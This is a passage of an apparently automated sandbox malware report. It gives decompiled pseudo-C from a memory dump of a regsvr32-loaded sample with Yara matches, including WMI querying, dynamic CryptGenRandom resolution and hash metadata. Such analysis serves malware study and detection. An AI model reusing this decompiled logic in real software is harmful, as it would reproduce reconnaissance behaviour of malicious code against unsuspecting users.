                                                                                                                                                                        							while(E05B9A0A3(_t22,  *_t31) != 0) {
                                                                                                                                                                        								_t26 = _a8 + 1;
                                                                                                                                                                        								_t31 = _v8 + 4;
                                                                                                                                                                        								_a8 = _t26;
                                                                                                                                                                        								_t22 = _v12;
                                                                                                                                                                        								_v8 = _v8 + 4;
                                                                                                                                                                        								if(_t26 < _t39[2]) {
                                                                                                                                                                        									continue;
                                                                                                                                                                        								} else {
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L8;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *_t36 =  *_t36 |  *_t39;
                                                                                                                                                                        						}
                                                                                                                                                                        						L8:
                                                                                                                                                                        						_t39 =  &(_t39[4]);
                                                                                                                                                                        						_t28 = _t28 - 1;
                                                                                                                                                                        					} while (_t28 != 0);
                                                                                                                                                                        				}
                                                                                                                                                                        				Sleep(0xa);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}










                                                                                                                                                                        APIs
                                                                                                                                                                        • Sleep.KERNELBASE(0000000A), ref: 05B9DAD6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 81c15f67adc072faa9e48aeab241ebdd516eb649bf95eca5b282a40d214fa382
                                                                                                                                                                        • Instruction ID: f05f2d0a2c82f6f0d4998f10f74e23456179ccbf50211fbb69bae5c3ec0412e7
                                                                                                                                                                        • Opcode Fuzzy Hash: 81c15f67adc072faa9e48aeab241ebdd516eb649bf95eca5b282a40d214fa382
                                                                                                                                                                        • Instruction Fuzzy Hash: B0111E71604205AFDB14CF6AC585AA9B7E8FB44224F1884B9E95697310D770F950CB41
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E05B9EA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                        				char _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				char _v48;
                                                                                                                                                                        				char _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                        				char* _v72;
                                                                                                                                                                        				signed short _v80;
                                                                                                                                                                        				signed int _v84;
                                                                                                                                                                        				char _v88;
                                                                                                                                                                        				char _v92;
                                                                                                                                                                        				char _v96;
                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                        				char _v104;
                                                                                                                                                                        				char _v616;
                                                                                                                                                                        				intOrPtr* _t159;
                                                                                                                                                                        				char _t165;
                                                                                                                                                                        				signed int _t166;
                                                                                                                                                                        				signed int _t173;
                                                                                                                                                                        				signed int _t178;
                                                                                                                                                                        				signed int _t186;
                                                                                                                                                                        				intOrPtr* _t187;
                                                                                                                                                                        				signed int _t188;
                                                                                                                                                                        				signed int _t192;
                                                                                                                                                                        				intOrPtr* _t193;
                                                                                                                                                                        				intOrPtr _t200;
                                                                                                                                                                        				intOrPtr* _t205;
                                                                                                                                                                        				signed int _t207;
                                                                                                                                                                        				signed int _t209;
                                                                                                                                                                        				intOrPtr* _t210;
                                                                                                                                                                        				intOrPtr _t212;
                                                                                                                                                                        				intOrPtr* _t213;
                                                                                                                                                                        				signed int _t214;
                                                                                                                                                                        				char _t217;
                                                                                                                                                                        				signed int _t218;
                                                                                                                                                                        				signed int _t219;
                                                                                                                                                                        				signed int _t230;
                                                                                                                                                                        				signed int _t235;
                                                                                                                                                                        				signed int _t242;
                                                                                                                                                                        				signed int _t243;
                                                                                                                                                                        				signed int _t244;
                                                                                                                                                                        				signed int _t245;
                                                                                                                                                                        				intOrPtr* _t247;
                                                                                                                                                                        				intOrPtr* _t251;
                                                                                                                                                                        				signed int _t252;
                                                                                                                                                                        				intOrPtr* _t253;
                                                                                                                                                                        				void* _t255;
                                                                                                                                                                        				intOrPtr* _t261;
                                                                                                                                                                        				signed int _t262;
                                                                                                                                                                        				signed int _t283;
                                                                                                                                                                        				signed int _t289;
                                                                                                                                                                        				char* _t298;
                                                                                                                                                                        				void* _t320;
                                                                                                                                                                        				signed int _t322;
                                                                                                                                                                        				intOrPtr* _t323;
                                                                                                                                                                        				intOrPtr _t324;
                                                                                                                                                                        				signed int _t327;
                                                                                                                                                                        				intOrPtr* _t328;
                                                                                                                                                                        				intOrPtr* _t329;
                                                                                                                                                                        
                                                                                                                                                                        				_v32 = _v32 & 0x00000000;
                                                                                                                                                                        				_v60 = _v60 & 0x00000000;
                                                                                                                                                                        				_v56 = __edx;
                                                                                                                                                                        				_v100 = __ecx;
                                                                                                                                                                        				_t159 = E05B9E400(__ecx);
                                                                                                                                                                        				_t251 = _t159;
                                                                                                                                                                        				_v104 = _t251;
                                                                                                                                                                        				if(_t251 == 0) {
                                                                                                                                                                        					return _t159;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t320 = E05B98BDE(0x10);
                                                                                                                                                                        				_v36 = _t320;
                                                                                                                                                                        				_pop(_t255);
                                                                                                                                                                        				if(_t320 == 0) {
                                                                                                                                                                        					L53:
                                                                                                                                                                        					E05B98BF4( &_v60, 0xfffffffe);
                                                                                                                                                                        					E05B9E4B4( &_v104);
                                                                                                                                                                        					return _t320;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t165 = E05B99DF2(_t255, 0x3a7);
                                                                                                                                                                        				 *_t328 = 0xae7;
                                                                                                                                                                        				_v52 = _t165;
                                                                                                                                                                        				_t166 = E05B99DF2(_t255);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_v56);
                                                                                                                                                                        				_v20 = _t166;
                                                                                                                                                                        				_push(_t166);
                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                        				_t322 = E05B99A5A(_t165);
                                                                                                                                                                        				_v60 = _t322;
                                                                                                                                                                        				E05B98BAF( &_v52);
                                                                                                                                                                        				E05B98BAF( &_v20);
                                                                                                                                                                        				_t329 = _t328 + 0x20;
                                                                                                                                                                        				if(_t322 != 0) {
                                                                                                                                                                        					_t323 = __imp__#2;
                                                                                                                                                                        					_v40 =  *_t323(_t322);
                                                                                                                                                                        					_t173 = E05B99DF2(_t255, 0x886);
                                                                                                                                                                        					_v20 = _t173;
                                                                                                                                                                        					_v52 =  *_t323(_t173);
                                                                                                                                                                        					E05B98BAF( &_v20);
                                                                                                                                                                        					_t324 = _v40;
                                                                                                                                                                        					_t261 =  *_t251;
                                                                                                                                                                        					_t252 = 0;
                                                                                                                                                                        					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                                                                                                                        					__eflags = _t178;
                                                                                                                                                                        					if(_t178 != 0) {
                                                                                                                                                                        						L52:
                                                                                                                                                                        						__imp__#6(_t324);
                                                                                                                                                                        						__imp__#6(_v52);
                                                                                                                                                                        						goto L53;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t262 = _v32;
                                                                                                                                                                        					_v28 = 0;
                                                                                                                                                                        					_v20 = 0;
                                                                                                                                                                        					__eflags = _t262;
                                                                                                                                                                        					if(_t262 == 0) {
                                                                                                                                                                        						L49:
                                                                                                                                                                        						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                                                                                                                        						__eflags = _t252;
                                                                                                                                                                        						if(_t252 == 0) {
                                                                                                                                                                        							E05B98BF4( &_v36, 0);
                                                                                                                                                                        							_t320 = _v36;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *(_t320 + 8) = _t252;
                                                                                                                                                                        							 *_t320 = E05B998BD(_v100);
                                                                                                                                                                        							 *((intOrPtr*)(_t320 + 4)) = E05B998BD(_v56);
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L52;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L6;
                                                                                                                                                                        					}
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						L6:
                                                                                                                                                                        						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                                                                                                                        						__eflags = _t186;
                                                                                                                                                                        						if(_t186 != 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                        						_v48 = 0;
                                                                                                                                                                        						_v12 = 0;
                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                        						__eflags = _v84;
                                                                                                                                                                        						if(_v84 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t187 = _v28;
                                                                                                                                                                        						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                                                                                                                        						__eflags = _t188;
                                                                                                                                                                        						if(_t188 >= 0) {
                                                                                                                                                                        							__imp__#20(_v24, 1,  &_v16);
                                                                                                                                                                        							__imp__#19(_v24, 1,  &_v48);
                                                                                                                                                                        							_t46 = _t320 + 0xc; // 0xc
                                                                                                                                                                        							_t253 = _t46;
                                                                                                                                                                        							_t327 = _t252 << 3;
                                                                                                                                                                        							_t47 = _t327 + 8; // 0x8
                                                                                                                                                                        							_t192 = E05B98C72(_t327, _t47);
                                                                                                                                                                        							__eflags = _t192;
                                                                                                                                                                        							if(_t192 == 0) {
                                                                                                                                                                        								__imp__#16(_v24);
                                                                                                                                                                        								_t193 = _v28;
                                                                                                                                                                        								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                                                                                                                        								L46:
                                                                                                                                                                        								_t252 = _v20;
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                                                                                                                        							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E05B98BDE( *(_t327 +  *_t253) << 3);
                                                                                                                                                                        							_t200 =  *_t253;
                                                                                                                                                                        							__eflags =  *(_t327 + _t200 + 4);
                                                                                                                                                                        							if( *(_t327 + _t200 + 4) == 0) {
                                                                                                                                                                        								_t136 = _t320 + 0xc; // 0xc
                                                                                                                                                                        								E05B98BF4(_t136, 0);
                                                                                                                                                                        								E05B98BF4( &_v36, 0);
                                                                                                                                                                        								__imp__#16(_v24);
                                                                                                                                                                        								_t205 = _v28;
                                                                                                                                                                        								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                                                                                                                        								_t320 = _v36;
                                                                                                                                                                        								goto L46;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t207 = _v16;
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								_v12 = _t207;
                                                                                                                                                                        								__eflags = _t207 - _v48;
                                                                                                                                                                        								if(_t207 > _v48) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v44 = _v44 & 0x00000000;
                                                                                                                                                                        								_t209 =  &_v12;
                                                                                                                                                                        								__imp__#25(_v24, _t209,  &_v44);
                                                                                                                                                                        								__eflags = _t209;
                                                                                                                                                                        								if(_t209 < 0) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t212 = E05B998BD(_v44);
                                                                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                                                                                                                        								_t213 = _v28;
                                                                                                                                                                        								_t281 =  *_t213;
                                                                                                                                                                        								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                                                                                        								__eflags = _t214;
                                                                                                                                                                        								if(_t214 < 0) {
                                                                                                                                                                        									L39:
                                                                                                                                                                        									__imp__#6(_v44);
                                                                                                                                                                        									_t207 = _v12 + 1;
                                                                                                                                                                        									__eflags = _t207;
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v92 = E05B99DF2(_t281, 0xb28);
                                                                                                                                                                        								 *_t329 = 0x83f;
                                                                                                                                                                        								_t217 = E05B99DF2(_t281);
                                                                                                                                                                        								_t283 = _v80;
                                                                                                                                                                        								_v96 = _t217;
                                                                                                                                                                        								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                        								__eflags = _t218 - 0xb;
                                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                                        									_t219 = _t218 - 0x10;
                                                                                                                                                                        									__eflags = _t219;
                                                                                                                                                                        									if(_t219 == 0) {
                                                                                                                                                                        										L35:
                                                                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E05B98BDE(0x18);
                                                                                                                                                                        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                        										__eflags = _t289;
                                                                                                                                                                        										if(_t289 == 0) {
                                                                                                                                                                        											L38:
                                                                                                                                                                        											E05B98BAF( &_v92);
                                                                                                                                                                        											E05B98BAF( &_v96);
                                                                                                                                                                        											__imp__#9( &_v80);
                                                                                                                                                                        											goto L39;
                                                                                                                                                                        										}
                                                                                                                                                                        										_push(_v72);
                                                                                                                                                                        										_push(L"%d");
                                                                                                                                                                        										L37:
                                                                                                                                                                        										_push(0xc);
                                                                                                                                                                        										_push(_t289);
                                                                                                                                                                        										E05B99E51();
                                                                                                                                                                        										_t329 = _t329 + 0x10;
                                                                                                                                                                        										goto L38;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t230 = _t219 - 1;
                                                                                                                                                                        									__eflags = _t230;
                                                                                                                                                                        									if(_t230 == 0) {
                                                                                                                                                                        										L33:
                                                                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E05B98BDE(0x18);
                                                                                                                                                                        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                        										__eflags = _t289;
                                                                                                                                                                        										if(_t289 == 0) {
                                                                                                                                                                        											goto L38;
                                                                                                                                                                        										}
                                                                                                                                                                        										_push(_v72);
                                                                                                                                                                        										_push(L"%u");
                                                                                                                                                                        										goto L37;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t235 = _t230 - 1;
                                                                                                                                                                        									__eflags = _t235;
                                                                                                                                                                        									if(_t235 == 0) {
                                                                                                                                                                        										goto L33;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _t235 == 1;
                                                                                                                                                                        									if(_t235 == 1) {
                                                                                                                                                                        										goto L33;
                                                                                                                                                                        									}
                                                                                                                                                                        									L28:
                                                                                                                                                                        									__eflags = _t283 & 0x00002000;
                                                                                                                                                                        									if((_t283 & 0x00002000) == 0) {
                                                                                                                                                                        										_v88 = E05B99DF2(_t283, 0xe0a);
                                                                                                                                                                        										E05B99E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                                                                                        										E05B98BAF( &_v88);
                                                                                                                                                                        										_t329 = _t329 + 0x18;
                                                                                                                                                                        										_t298 =  &_v616;
                                                                                                                                                                        										L31:
                                                                                                                                                                        										_t242 = E05B998BD(_t298);
                                                                                                                                                                        										L32:
                                                                                                                                                                        										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                                                                                        										goto L38;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t242 = E05B9E92E( &_v80);
                                                                                                                                                                        									goto L32;
                                                                                                                                                                        								}
                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                        									__eflags = _v72 - 0xffff;
                                                                                                                                                                        									_t298 = L"TRUE";
                                                                                                                                                                        									if(_v72 != 0xffff) {
                                                                                                                                                                        										_t298 = L"FALSE";
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L31;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t243 = _t218 - 1;
                                                                                                                                                                        								__eflags = _t243;
                                                                                                                                                                        								if(_t243 == 0) {
                                                                                                                                                                        									goto L38;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t244 = _t243 - 1;
                                                                                                                                                                        								__eflags = _t244;
                                                                                                                                                                        								if(_t244 == 0) {
                                                                                                                                                                        									goto L35;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t245 = _t244 - 1;
                                                                                                                                                                        								__eflags = _t245;
                                                                                                                                                                        								if(_t245 == 0) {
                                                                                                                                                                        									goto L35;
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags = _t245 != 5;
                                                                                                                                                                        								if(_t245 != 5) {
                                                                                                                                                                        									goto L28;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t298 = _v72;
                                                                                                                                                                        								goto L31;
                                                                                                                                                                        							}
                                                                                                                                                                        							__imp__#16(_v24);
                                                                                                                                                                        							_t210 = _v28;
                                                                                                                                                                        							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                                                                                        							_t252 = _v20;
                                                                                                                                                                        							L42:
                                                                                                                                                                        							_t262 = _v32;
                                                                                                                                                                        							_t252 = _t252 + 1;
                                                                                                                                                                        							_v20 = _t252;
                                                                                                                                                                        							__eflags = _t262;
                                                                                                                                                                        							if(_t262 != 0) {
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							L48:
                                                                                                                                                                        							_t324 = _v40;
                                                                                                                                                                        							goto L49;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t247 = _v28;
                                                                                                                                                                        						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                                                                                        						goto L42;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t262 = _v32;
                                                                                                                                                                        					goto L48;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E05B98BF4( &_v36, _t322);
                                                                                                                                                                        					_t320 = _v36;
                                                                                                                                                                        					goto L53;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

                                                                                                                                                                        0x05b9ed64
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ed6a
                                                                                                                                                                        0x05b9ed6b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ed6b
                                                                                                                                                                        0x05b9ecd1
                                                                                                                                                                        0x05b9ecd1
                                                                                                                                                                        0x05b9ecd4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ecd6
                                                                                                                                                                        0x05b9ecd9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ecdb
                                                                                                                                                                        0x05b9ecdb
                                                                                                                                                                        0x05b9ece1
                                                                                                                                                                        0x05b9ecfd
                                                                                                                                                                        0x05b9ed0c
                                                                                                                                                                        0x05b9ed15
                                                                                                                                                                        0x05b9ed1a
                                                                                                                                                                        0x05b9ed1d
                                                                                                                                                                        0x05b9ed23
                                                                                                                                                                        0x05b9ed23
                                                                                                                                                                        0x05b9ed28
                                                                                                                                                                        0x05b9ed34
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ed34
                                                                                                                                                                        0x05b9ece6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ece6
                                                                                                                                                                        0x05b9ec89
                                                                                                                                                                        0x05b9ecb0
                                                                                                                                                                        0x05b9ecb5
                                                                                                                                                                        0x05b9ecba
                                                                                                                                                                        0x05b9ecbc
                                                                                                                                                                        0x05b9ecbc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ecba
                                                                                                                                                                        0x05b9ec8b
                                                                                                                                                                        0x05b9ec8b
                                                                                                                                                                        0x05b9ec8e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ec94
                                                                                                                                                                        0x05b9ec94
                                                                                                                                                                        0x05b9ec97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ec9d
                                                                                                                                                                        0x05b9ec9d
                                                                                                                                                                        0x05b9eca0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9eca6
                                                                                                                                                                        0x05b9eca9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ecab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ecab
                                                                                                                                                                        0x05b9eded
                                                                                                                                                                        0x05b9edf3
                                                                                                                                                                        0x05b9edf9
                                                                                                                                                                        0x05b9edfc
                                                                                                                                                                        0x05b9edff
                                                                                                                                                                        0x05b9edff
                                                                                                                                                                        0x05b9ee02
                                                                                                                                                                        0x05b9ee03
                                                                                                                                                                        0x05b9ee06
                                                                                                                                                                        0x05b9ee08
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ee58
                                                                                                                                                                        0x05b9ee58
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ee58
                                                                                                                                                                        0x05b9eb8f
                                                                                                                                                                        0x05b9eb95
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9eb95
                                                                                                                                                                        0x05b9ee55
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ead8
                                                                                                                                                                        0x05b9eadd
                                                                                                                                                                        0x05b9eae2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9eae6

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B9E400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E413
                                                                                                                                                                          • Part of subcall function 05B9E400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E424
                                                                                                                                                                          • Part of subcall function 05B9E400: CoCreateInstance.OLE32(05BAC868,00000000,00000001,05BAC878,?,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E43B
                                                                                                                                                                          • Part of subcall function 05B9E400: SysAllocString.OLEAUT32(00000000), ref: 05B9E446
                                                                                                                                                                          • Part of subcall function 05B9E400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E471
                                                                                                                                                                          • Part of subcall function 05B98BDE: RtlAllocateHeap.NTDLL(00000008,?,?,05B9959D,00000100,?,05B96507), ref: 05B98BEC
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 05B9EAF3
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 05B9EB07
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 05B9EE90
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 05B9EE99
                                                                                                                                                                          • Part of subcall function 05B98BF4: HeapFree.KERNEL32(00000000,00000000), ref: 05B98C3A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                        • String ID: FALSE$TRUE
                                                                                                                                                                        • API String ID: 1290676130-1412513891
                                                                                                                                                                        • Opcode ID: e701b966a3364a73199951a4549df30784317d019bca9237bf65d811764acfe8
                                                                                                                                                                        • Instruction ID: 561103878d09b8e915043cc42c73f0db9b9589a79d0c4c70fd6804f3d4ebe1e5
                                                                                                                                                                        • Opcode Fuzzy Hash: e701b966a3364a73199951a4549df30784317d019bca9237bf65d811764acfe8
                                                                                                                                                                        • Instruction Fuzzy Hash: 76E13C71A00219AFDF18DFA8C889AAEBBB9FF49300F1444A9E506A7254DB31F941CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E05BA28F0(intOrPtr* _a4) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				_Unknown_base(*)()* _t15;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                        				intOrPtr* _t29;
                                                                                                                                                                        				struct HINSTANCE__* _t30;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                                                                                                                        				if(_t30 == 0) {
                                                                                                                                                                        					L7:
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                                                                                                                        				_v12 = _t15;
                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0xf0000000);
                                                                                                                                                                        				_push(1);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push( &_v8);
                                                                                                                                                                        				if( *_t25() == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t20 = _v12(_v8, 4,  &_v16);
                                                                                                                                                                        				 *_t29(_v8, 0);
                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				 *_a4 = E05BA284B( &_v16);
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}












                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,05B97B6A), ref: 05BA2902
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 05BA291A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 05BA2928
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 05BA2937
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                        • API String ID: 667068680-129414566
                                                                                                                                                                        • Opcode ID: 9503570ea6a85d89fd4585ed007f1a410602e5f29611b2990bd8f125c134fa52
                                                                                                                                                                        • Instruction ID: 5d61a9b45b4c907ebc870a7853456cf13640e4b01cb404556b84c362ce576efb
                                                                                                                                                                        • Opcode Fuzzy Hash: 9503570ea6a85d89fd4585ed007f1a410602e5f29611b2990bd8f125c134fa52
                                                                                                                                                                        • Instruction Fuzzy Hash: 24118237A5830A77DB2197A48C45F9EF6ACAF84A50F1500B0F601F7150EA70FA0197A4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E05B9F7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				char _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				int _v32;
                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				char _v56;
                                                                                                                                                                        				int _v68;
                                                                                                                                                                        				void* _v72;
                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                        				int _v96;
                                                                                                                                                                        				void* _v100;
                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                        				intOrPtr _v108;
                                                                                                                                                                        				char* _v112;
                                                                                                                                                                        				char _v116;
                                                                                                                                                                        				char _v132;
